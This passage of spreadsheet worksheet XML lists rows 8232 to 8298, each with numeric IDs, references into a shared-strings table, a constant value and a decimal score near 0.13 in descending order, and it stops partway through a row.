    <row r="8232" ht="15.75" customHeight="1">
      <c r="A8232" s="1">
        <v>5138.0</v>
      </c>
      <c r="B8232" s="2">
        <v>4.4639014E7</v>
      </c>
      <c r="C8232" s="2" t="s">
        <v>7825</v>
      </c>
      <c r="D8232" s="2">
        <v>1.0</v>
      </c>
      <c r="E8232" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8232" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8233" ht="15.75" customHeight="1">
      <c r="A8233" s="1">
        <v>6019.0</v>
      </c>
      <c r="B8233" s="2">
        <v>4.7498937E7</v>
      </c>
      <c r="C8233" s="2" t="s">
        <v>7826</v>
      </c>
      <c r="D8233" s="2">
        <v>1.0</v>
      </c>
      <c r="E8233" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8233" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8234" ht="15.75" customHeight="1">
      <c r="A8234" s="1">
        <v>7265.0</v>
      </c>
      <c r="B8234" s="2">
        <v>5.0770703E7</v>
      </c>
      <c r="C8234" s="2" t="s">
        <v>7827</v>
      </c>
      <c r="D8234" s="2">
        <v>1.0</v>
      </c>
      <c r="E8234" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8234" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8235" ht="15.75" customHeight="1">
      <c r="A8235" s="1">
        <v>7362.0</v>
      </c>
      <c r="B8235" s="2">
        <v>5.1017461E7</v>
      </c>
      <c r="C8235" s="2" t="s">
        <v>7828</v>
      </c>
      <c r="D8235" s="2">
        <v>1.0</v>
      </c>
      <c r="E8235" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8235" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8236" ht="15.75" customHeight="1">
      <c r="A8236" s="1">
        <v>7810.0</v>
      </c>
      <c r="B8236" s="2">
        <v>5.2239029E7</v>
      </c>
      <c r="C8236" s="2" t="s">
        <v>7829</v>
      </c>
      <c r="D8236" s="2">
        <v>1.0</v>
      </c>
      <c r="E8236" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8236" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8237" ht="15.75" customHeight="1">
      <c r="A8237" s="1">
        <v>9040.0</v>
      </c>
      <c r="B8237" s="2">
        <v>5.5053027E7</v>
      </c>
      <c r="C8237" s="2" t="s">
        <v>7830</v>
      </c>
      <c r="D8237" s="2">
        <v>1.0</v>
      </c>
      <c r="E8237" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8237" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8238" ht="15.75" customHeight="1">
      <c r="A8238" s="1">
        <v>9549.0</v>
      </c>
      <c r="B8238" s="2">
        <v>5.6027387E7</v>
      </c>
      <c r="C8238" s="2" t="s">
        <v>7831</v>
      </c>
      <c r="D8238" s="2">
        <v>1.0</v>
      </c>
      <c r="E8238" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8238" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8239" ht="15.75" customHeight="1">
      <c r="A8239" s="1">
        <v>9858.0</v>
      </c>
      <c r="B8239" s="2">
        <v>5.6709687E7</v>
      </c>
      <c r="C8239" s="2" t="s">
        <v>7832</v>
      </c>
      <c r="D8239" s="2">
        <v>1.0</v>
      </c>
      <c r="E8239" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8239" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8240" ht="15.75" customHeight="1">
      <c r="A8240" s="1">
        <v>12284.0</v>
      </c>
      <c r="B8240" s="2">
        <v>2.8178751E7</v>
      </c>
      <c r="C8240" s="2" t="s">
        <v>7833</v>
      </c>
      <c r="D8240" s="2">
        <v>1.0</v>
      </c>
      <c r="E8240" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8240" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8241" ht="15.75" customHeight="1">
      <c r="A8241" s="1">
        <v>12772.0</v>
      </c>
      <c r="B8241" s="2">
        <v>3.1260037E7</v>
      </c>
      <c r="C8241" s="2" t="s">
        <v>7834</v>
      </c>
      <c r="D8241" s="2">
        <v>1.0</v>
      </c>
      <c r="E8241" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8241" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8242" ht="15.75" customHeight="1">
      <c r="A8242" s="1">
        <v>13394.0</v>
      </c>
      <c r="B8242" s="2">
        <v>3.4962786E7</v>
      </c>
      <c r="C8242" s="2" t="s">
        <v>7835</v>
      </c>
      <c r="D8242" s="2">
        <v>1.0</v>
      </c>
      <c r="E8242" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8242" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8243" ht="15.75" customHeight="1">
      <c r="A8243" s="1">
        <v>13542.0</v>
      </c>
      <c r="B8243" s="2">
        <v>3.5621401E7</v>
      </c>
      <c r="C8243" s="2" t="s">
        <v>7836</v>
      </c>
      <c r="D8243" s="2">
        <v>1.0</v>
      </c>
      <c r="E8243" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8243" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8244" ht="15.75" customHeight="1">
      <c r="A8244" s="1">
        <v>13656.0</v>
      </c>
      <c r="B8244" s="2">
        <v>3.5965629E7</v>
      </c>
      <c r="C8244" s="2" t="s">
        <v>7837</v>
      </c>
      <c r="D8244" s="2">
        <v>1.0</v>
      </c>
      <c r="E8244" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8244" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8245" ht="15.75" customHeight="1">
      <c r="A8245" s="1">
        <v>14026.0</v>
      </c>
      <c r="B8245" s="2">
        <v>3.750169E7</v>
      </c>
      <c r="C8245" s="2" t="s">
        <v>7838</v>
      </c>
      <c r="D8245" s="2">
        <v>1.0</v>
      </c>
      <c r="E8245" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8245" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8246" ht="15.75" customHeight="1">
      <c r="A8246" s="1">
        <v>14409.0</v>
      </c>
      <c r="B8246" s="2">
        <v>3.9213984E7</v>
      </c>
      <c r="C8246" s="2" t="s">
        <v>7819</v>
      </c>
      <c r="D8246" s="2">
        <v>1.0</v>
      </c>
      <c r="E8246" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8246" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8247" ht="15.75" customHeight="1">
      <c r="A8247" s="1">
        <v>14911.0</v>
      </c>
      <c r="B8247" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C8247" s="2" t="s">
        <v>7839</v>
      </c>
      <c r="D8247" s="2">
        <v>1.0</v>
      </c>
      <c r="E8247" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8247" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8248" ht="15.75" customHeight="1">
      <c r="A8248" s="1">
        <v>15169.0</v>
      </c>
      <c r="B8248" s="2">
        <v>4.2005878E7</v>
      </c>
      <c r="C8248" s="2" t="s">
        <v>7840</v>
      </c>
      <c r="D8248" s="2">
        <v>1.0</v>
      </c>
      <c r="E8248" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8248" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8249" ht="15.75" customHeight="1">
      <c r="A8249" s="1">
        <v>16290.0</v>
      </c>
      <c r="B8249" s="2">
        <v>4.5829346E7</v>
      </c>
      <c r="C8249" s="2" t="s">
        <v>7841</v>
      </c>
      <c r="D8249" s="2">
        <v>1.0</v>
      </c>
      <c r="E8249" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8249" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8250" ht="15.75" customHeight="1">
      <c r="A8250" s="1">
        <v>17895.0</v>
      </c>
      <c r="B8250" s="2">
        <v>5.1079647E7</v>
      </c>
      <c r="C8250" s="2" t="s">
        <v>7842</v>
      </c>
      <c r="D8250" s="2">
        <v>1.0</v>
      </c>
      <c r="E8250" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8250" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8251" ht="15.75" customHeight="1">
      <c r="A8251" s="1">
        <v>18086.0</v>
      </c>
      <c r="B8251" s="2">
        <v>5.1662295E7</v>
      </c>
      <c r="C8251" s="2" t="s">
        <v>7843</v>
      </c>
      <c r="D8251" s="2">
        <v>1.0</v>
      </c>
      <c r="E8251" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8251" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8252" ht="15.75" customHeight="1">
      <c r="A8252" s="1">
        <v>20044.0</v>
      </c>
      <c r="B8252" s="2">
        <v>7773816.0</v>
      </c>
      <c r="C8252" s="2" t="s">
        <v>7844</v>
      </c>
      <c r="D8252" s="2">
        <v>1.0</v>
      </c>
      <c r="E8252" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8252" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8253" ht="15.75" customHeight="1">
      <c r="A8253" s="1">
        <v>20252.0</v>
      </c>
      <c r="B8253" s="2">
        <v>1.0968244E7</v>
      </c>
      <c r="C8253" s="2" t="s">
        <v>7845</v>
      </c>
      <c r="D8253" s="2">
        <v>1.0</v>
      </c>
      <c r="E8253" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8253" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8254" ht="15.75" customHeight="1">
      <c r="A8254" s="1">
        <v>22200.0</v>
      </c>
      <c r="B8254" s="2">
        <v>3.1967409E7</v>
      </c>
      <c r="C8254" s="2" t="s">
        <v>7846</v>
      </c>
      <c r="D8254" s="2">
        <v>1.0</v>
      </c>
      <c r="E8254" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8254" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8255" ht="15.75" customHeight="1">
      <c r="A8255" s="1">
        <v>22484.0</v>
      </c>
      <c r="B8255" s="2">
        <v>3.6982727E7</v>
      </c>
      <c r="C8255" s="2" t="s">
        <v>7847</v>
      </c>
      <c r="D8255" s="2">
        <v>1.0</v>
      </c>
      <c r="E8255" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8255" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8256" ht="15.75" customHeight="1">
      <c r="A8256" s="1">
        <v>22820.0</v>
      </c>
      <c r="B8256" s="2">
        <v>4.6223098E7</v>
      </c>
      <c r="C8256" s="2" t="s">
        <v>7848</v>
      </c>
      <c r="D8256" s="2">
        <v>1.0</v>
      </c>
      <c r="E8256" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8256" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8257" ht="15.75" customHeight="1">
      <c r="A8257" s="1">
        <v>24584.0</v>
      </c>
      <c r="B8257" s="2">
        <v>1.1329567E7</v>
      </c>
      <c r="C8257" s="2" t="s">
        <v>7849</v>
      </c>
      <c r="D8257" s="2">
        <v>1.0</v>
      </c>
      <c r="E8257" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8257" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8258" ht="15.75" customHeight="1">
      <c r="A8258" s="1">
        <v>26949.0</v>
      </c>
      <c r="B8258" s="2">
        <v>1.9591142E7</v>
      </c>
      <c r="C8258" s="2" t="s">
        <v>7850</v>
      </c>
      <c r="D8258" s="2">
        <v>1.0</v>
      </c>
      <c r="E8258" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8258" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8259" ht="15.75" customHeight="1">
      <c r="A8259" s="1">
        <v>31639.0</v>
      </c>
      <c r="B8259" s="2">
        <v>5147141.0</v>
      </c>
      <c r="C8259" s="2" t="s">
        <v>7851</v>
      </c>
      <c r="D8259" s="2">
        <v>1.0</v>
      </c>
      <c r="E8259" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8259" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="8260" ht="15.75" customHeight="1">
      <c r="A8260" s="1">
        <v>33729.0</v>
      </c>
      <c r="B8260" s="2">
        <v>8526329.0</v>
      </c>
      <c r="C8260" s="2" t="s">
        <v>7852</v>
      </c>
      <c r="D8260" s="2">
        <v>1.0</v>
      </c>
      <c r="E8260" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8260" s="2">
        <v>0.1325396825396826</v>
      </c>
    </row>
    <row r="8261" ht="15.75" customHeight="1">
      <c r="A8261" s="1">
        <v>5051.0</v>
      </c>
      <c r="B8261" s="2">
        <v>4.4333131E7</v>
      </c>
      <c r="C8261" s="2" t="s">
        <v>7853</v>
      </c>
      <c r="D8261" s="2">
        <v>1.0</v>
      </c>
      <c r="E8261" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8261" s="2">
        <v>0.1324786324786325</v>
      </c>
    </row>
    <row r="8262" ht="15.75" customHeight="1">
      <c r="A8262" s="1">
        <v>14933.0</v>
      </c>
      <c r="B8262" s="2">
        <v>4.1238917E7</v>
      </c>
      <c r="C8262" s="2" t="s">
        <v>7854</v>
      </c>
      <c r="D8262" s="2">
        <v>1.0</v>
      </c>
      <c r="E8262" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8262" s="2">
        <v>0.1324786324786325</v>
      </c>
    </row>
    <row r="8263" ht="15.75" customHeight="1">
      <c r="A8263" s="1">
        <v>24748.0</v>
      </c>
      <c r="B8263" s="2">
        <v>1.1815341E7</v>
      </c>
      <c r="C8263" s="2" t="s">
        <v>7855</v>
      </c>
      <c r="D8263" s="2">
        <v>1.0</v>
      </c>
      <c r="E8263" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8263" s="2">
        <v>0.1324786324786325</v>
      </c>
    </row>
    <row r="8264" ht="15.75" customHeight="1">
      <c r="A8264" s="1">
        <v>29141.0</v>
      </c>
      <c r="B8264" s="2">
        <v>3.0559669E7</v>
      </c>
      <c r="C8264" s="2" t="s">
        <v>7856</v>
      </c>
      <c r="D8264" s="2">
        <v>1.0</v>
      </c>
      <c r="E8264" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8264" s="2">
        <v>0.1324786324786325</v>
      </c>
    </row>
    <row r="8265" ht="15.75" customHeight="1">
      <c r="A8265" s="1">
        <v>10575.0</v>
      </c>
      <c r="B8265" s="2">
        <v>1.2964169E7</v>
      </c>
      <c r="C8265" s="2" t="s">
        <v>7857</v>
      </c>
      <c r="D8265" s="2">
        <v>1.0</v>
      </c>
      <c r="E8265" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8265" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="8266" ht="15.75" customHeight="1">
      <c r="A8266" s="1">
        <v>883.0</v>
      </c>
      <c r="B8266" s="2">
        <v>2.195675E7</v>
      </c>
      <c r="C8266" s="2" t="s">
        <v>7858</v>
      </c>
      <c r="D8266" s="2">
        <v>1.0</v>
      </c>
      <c r="E8266" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8266" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="8267" ht="15.75" customHeight="1">
      <c r="A8267" s="1">
        <v>5697.0</v>
      </c>
      <c r="B8267" s="2">
        <v>4.6502396E7</v>
      </c>
      <c r="C8267" s="2" t="s">
        <v>7859</v>
      </c>
      <c r="D8267" s="2">
        <v>1.0</v>
      </c>
      <c r="E8267" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8267" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="8268" ht="15.75" customHeight="1">
      <c r="A8268" s="1">
        <v>12833.0</v>
      </c>
      <c r="B8268" s="2">
        <v>3.1655749E7</v>
      </c>
      <c r="C8268" s="2" t="s">
        <v>7860</v>
      </c>
      <c r="D8268" s="2">
        <v>1.0</v>
      </c>
      <c r="E8268" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8268" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="8269" ht="15.75" customHeight="1">
      <c r="A8269" s="1">
        <v>26363.0</v>
      </c>
      <c r="B8269" s="2">
        <v>1.686264E7</v>
      </c>
      <c r="C8269" s="2" t="s">
        <v>7861</v>
      </c>
      <c r="D8269" s="2">
        <v>1.0</v>
      </c>
      <c r="E8269" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8269" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="8270" ht="15.75" customHeight="1">
      <c r="A8270" s="1">
        <v>12759.0</v>
      </c>
      <c r="B8270" s="2">
        <v>3.1163914E7</v>
      </c>
      <c r="C8270" s="2" t="s">
        <v>7862</v>
      </c>
      <c r="D8270" s="2">
        <v>1.0</v>
      </c>
      <c r="E8270" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8270" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="8271" ht="15.75" customHeight="1">
      <c r="A8271" s="1">
        <v>16051.0</v>
      </c>
      <c r="B8271" s="2">
        <v>4.5228712E7</v>
      </c>
      <c r="C8271" s="2" t="s">
        <v>7863</v>
      </c>
      <c r="D8271" s="2">
        <v>1.0</v>
      </c>
      <c r="E8271" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8271" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="8272" ht="15.75" customHeight="1">
      <c r="A8272" s="1">
        <v>26245.0</v>
      </c>
      <c r="B8272" s="2">
        <v>1.631486E7</v>
      </c>
      <c r="C8272" s="2" t="s">
        <v>7864</v>
      </c>
      <c r="D8272" s="2">
        <v>1.0</v>
      </c>
      <c r="E8272" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8272" s="2">
        <v>0.1320346320346321</v>
      </c>
    </row>
    <row r="8273" ht="15.75" customHeight="1">
      <c r="A8273" s="1">
        <v>7015.0</v>
      </c>
      <c r="B8273" s="2">
        <v>5.0095074E7</v>
      </c>
      <c r="C8273" s="2" t="s">
        <v>7865</v>
      </c>
      <c r="D8273" s="2">
        <v>1.0</v>
      </c>
      <c r="E8273" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8273" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="8274" ht="15.75" customHeight="1">
      <c r="A8274" s="1">
        <v>8980.0</v>
      </c>
      <c r="B8274" s="2">
        <v>5.496181E7</v>
      </c>
      <c r="C8274" s="2" t="s">
        <v>7866</v>
      </c>
      <c r="D8274" s="2">
        <v>1.0</v>
      </c>
      <c r="E8274" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8274" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="8275" ht="15.75" customHeight="1">
      <c r="A8275" s="1">
        <v>9407.0</v>
      </c>
      <c r="B8275" s="2">
        <v>5.5769185E7</v>
      </c>
      <c r="C8275" s="2" t="s">
        <v>7867</v>
      </c>
      <c r="D8275" s="2">
        <v>1.0</v>
      </c>
      <c r="E8275" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8275" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="8276" ht="15.75" customHeight="1">
      <c r="A8276" s="1">
        <v>9608.0</v>
      </c>
      <c r="B8276" s="2">
        <v>5.616608E7</v>
      </c>
      <c r="C8276" s="2" t="s">
        <v>7868</v>
      </c>
      <c r="D8276" s="2">
        <v>1.0</v>
      </c>
      <c r="E8276" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8276" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="8277" ht="15.75" customHeight="1">
      <c r="A8277" s="1">
        <v>12805.0</v>
      </c>
      <c r="B8277" s="2">
        <v>3.1484553E7</v>
      </c>
      <c r="C8277" s="2" t="s">
        <v>7869</v>
      </c>
      <c r="D8277" s="2">
        <v>1.0</v>
      </c>
      <c r="E8277" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8277" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="8278" ht="15.75" customHeight="1">
      <c r="A8278" s="1">
        <v>15079.0</v>
      </c>
      <c r="B8278" s="2">
        <v>4.1740763E7</v>
      </c>
      <c r="C8278" s="2" t="s">
        <v>7870</v>
      </c>
      <c r="D8278" s="2">
        <v>1.0</v>
      </c>
      <c r="E8278" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8278" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="8279" ht="15.75" customHeight="1">
      <c r="A8279" s="1">
        <v>21208.0</v>
      </c>
      <c r="B8279" s="2">
        <v>1.9533613E7</v>
      </c>
      <c r="C8279" s="2" t="s">
        <v>7753</v>
      </c>
      <c r="D8279" s="2">
        <v>1.0</v>
      </c>
      <c r="E8279" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8279" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="8280" ht="15.75" customHeight="1">
      <c r="A8280" s="1">
        <v>14850.0</v>
      </c>
      <c r="B8280" s="2">
        <v>4.1061854E7</v>
      </c>
      <c r="C8280" s="2" t="s">
        <v>7871</v>
      </c>
      <c r="D8280" s="2">
        <v>1.0</v>
      </c>
      <c r="E8280" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8280" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="8281" ht="15.75" customHeight="1">
      <c r="A8281" s="1">
        <v>15309.0</v>
      </c>
      <c r="B8281" s="2">
        <v>4.2499314E7</v>
      </c>
      <c r="C8281" s="2" t="s">
        <v>7872</v>
      </c>
      <c r="D8281" s="2">
        <v>1.0</v>
      </c>
      <c r="E8281" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8281" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="8282" ht="15.75" customHeight="1">
      <c r="A8282" s="1">
        <v>18486.0</v>
      </c>
      <c r="B8282" s="2">
        <v>5.2896331E7</v>
      </c>
      <c r="C8282" s="2" t="s">
        <v>7873</v>
      </c>
      <c r="D8282" s="2">
        <v>1.0</v>
      </c>
      <c r="E8282" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8282" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="8283" ht="15.75" customHeight="1">
      <c r="A8283" s="1">
        <v>10155.0</v>
      </c>
      <c r="B8283" s="2">
        <v>5.7326833E7</v>
      </c>
      <c r="C8283" s="2" t="s">
        <v>7874</v>
      </c>
      <c r="D8283" s="2">
        <v>1.0</v>
      </c>
      <c r="E8283" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8283" s="2">
        <v>0.131578947368421</v>
      </c>
    </row>
    <row r="8284" ht="15.75" customHeight="1">
      <c r="A8284" s="1">
        <v>16033.0</v>
      </c>
      <c r="B8284" s="2">
        <v>4.5108392E7</v>
      </c>
      <c r="C8284" s="2" t="s">
        <v>7875</v>
      </c>
      <c r="D8284" s="2">
        <v>1.0</v>
      </c>
      <c r="E8284" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8284" s="2">
        <v>0.131578947368421</v>
      </c>
    </row>
    <row r="8285" ht="15.75" customHeight="1">
      <c r="A8285" s="1">
        <v>33113.0</v>
      </c>
      <c r="B8285" s="2">
        <v>6959208.0</v>
      </c>
      <c r="C8285" s="2" t="s">
        <v>7876</v>
      </c>
      <c r="D8285" s="2">
        <v>1.0</v>
      </c>
      <c r="E8285" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8285" s="2">
        <v>0.131578947368421</v>
      </c>
    </row>
    <row r="8286" ht="15.75" customHeight="1">
      <c r="A8286" s="1">
        <v>4685.0</v>
      </c>
      <c r="B8286" s="2">
        <v>4.3217475E7</v>
      </c>
      <c r="C8286" s="2" t="s">
        <v>7877</v>
      </c>
      <c r="D8286" s="2">
        <v>1.0</v>
      </c>
      <c r="E8286" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8286" s="2">
        <v>0.1315359477124184</v>
      </c>
    </row>
    <row r="8287" ht="15.75" customHeight="1">
      <c r="A8287" s="1">
        <v>3668.0</v>
      </c>
      <c r="B8287" s="2">
        <v>3.9397442E7</v>
      </c>
      <c r="C8287" s="2" t="s">
        <v>7878</v>
      </c>
      <c r="D8287" s="2">
        <v>1.0</v>
      </c>
      <c r="E8287" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8287" s="2">
        <v>0.1313932980599648</v>
      </c>
    </row>
    <row r="8288" ht="15.75" customHeight="1">
      <c r="A8288" s="1">
        <v>32627.0</v>
      </c>
      <c r="B8288" s="2">
        <v>5843371.0</v>
      </c>
      <c r="C8288" s="2" t="s">
        <v>7879</v>
      </c>
      <c r="D8288" s="2">
        <v>1.0</v>
      </c>
      <c r="E8288" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8288" s="2">
        <v>0.1313932980599648</v>
      </c>
    </row>
    <row r="8289" ht="15.75" customHeight="1">
      <c r="A8289" s="1">
        <v>29013.0</v>
      </c>
      <c r="B8289" s="2">
        <v>3.0001463E7</v>
      </c>
      <c r="C8289" s="2" t="s">
        <v>7880</v>
      </c>
      <c r="D8289" s="2">
        <v>1.0</v>
      </c>
      <c r="E8289" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8289" s="2">
        <v>0.1313932980599647</v>
      </c>
    </row>
    <row r="8290" ht="15.75" customHeight="1">
      <c r="A8290" s="1">
        <v>6227.0</v>
      </c>
      <c r="B8290" s="2">
        <v>4.8033369E7</v>
      </c>
      <c r="C8290" s="2" t="s">
        <v>7881</v>
      </c>
      <c r="D8290" s="2">
        <v>1.0</v>
      </c>
      <c r="E8290" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8290" s="2">
        <v>0.1312260536398468</v>
      </c>
    </row>
    <row r="8291" ht="15.75" customHeight="1">
      <c r="A8291" s="1">
        <v>20015.0</v>
      </c>
      <c r="B8291" s="2">
        <v>5814866.0</v>
      </c>
      <c r="C8291" s="2" t="s">
        <v>7882</v>
      </c>
      <c r="D8291" s="2">
        <v>1.0</v>
      </c>
      <c r="E8291" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8291" s="2">
        <v>0.131076388888889</v>
      </c>
    </row>
    <row r="8292" ht="15.75" customHeight="1">
      <c r="A8292" s="1">
        <v>4497.0</v>
      </c>
      <c r="B8292" s="2">
        <v>4.2548829E7</v>
      </c>
      <c r="C8292" s="2" t="s">
        <v>7883</v>
      </c>
      <c r="D8292" s="2">
        <v>1.0</v>
      </c>
      <c r="E8292" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8292" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="8293" ht="15.75" customHeight="1">
      <c r="A8293" s="1">
        <v>17297.0</v>
      </c>
      <c r="B8293" s="2">
        <v>4.9256502E7</v>
      </c>
      <c r="C8293" s="2" t="s">
        <v>7884</v>
      </c>
      <c r="D8293" s="2">
        <v>1.0</v>
      </c>
      <c r="E8293" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8293" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="8294" ht="15.75" customHeight="1">
      <c r="A8294" s="1">
        <v>6531.0</v>
      </c>
      <c r="B8294" s="2">
        <v>4.8828599E7</v>
      </c>
      <c r="C8294" s="2" t="s">
        <v>7885</v>
      </c>
      <c r="D8294" s="2">
        <v>1.0</v>
      </c>
      <c r="E8294" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8294" s="2">
        <v>0.130952380952381</v>
      </c>
    </row>
    <row r="8295" ht="15.75" customHeight="1">
      <c r="A8295" s="1">
        <v>9111.0</v>
      </c>
      <c r="B8295" s="2">
        <v>5.5189629E7</v>
      </c>
      <c r="C8295" s="2" t="s">
        <v>7886</v>
      </c>
      <c r="D8295" s="2">
        <v>1.0</v>
      </c>
      <c r="E8295" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8295" s="2">
        <v>0.1308851224105462</v>
      </c>
    </row>
    <row r="8296" ht="15.75" customHeight="1">
      <c r="A8296" s="1">
        <v>5762.0</v>
      </c>
      <c r="B8296" s="2">
        <v>4.6674355E7</v>
      </c>
      <c r="C8296" s="2" t="s">
        <v>7887</v>
      </c>
      <c r="D8296" s="2">
        <v>1.0</v>
      </c>
      <c r="E8296" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8296" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="8297" ht="15.75" customHeight="1">
      <c r="A8297" s="1">
        <v>7047.0</v>
      </c>
      <c r="B8297" s="2">
        <v>5.0153322E7</v>
      </c>
      <c r="C8297" s="2" t="s">
        <v>7888</v>
      </c>
      <c r="D8297" s="2">
        <v>1.0</v>
      </c>
      <c r="E8297" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8297" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="8298" ht="15.75" customHeight="1">
      <c r="A8298" s="1">
        <v>9623.0</v>
      </c>
      <c r="B8298" s="2">
        <v>5.6213162E7</v>
      </c>
      <c r="C8298" s="2" t="s">
        <v>7889</v>
      </c>
      <c r="D8298" s="2">
        <v>1.0</v>
      </c>
      <c r="E8298" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8298" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="8299" ht="15.75" customHeight="1">
      <c r="A8299" s="1">
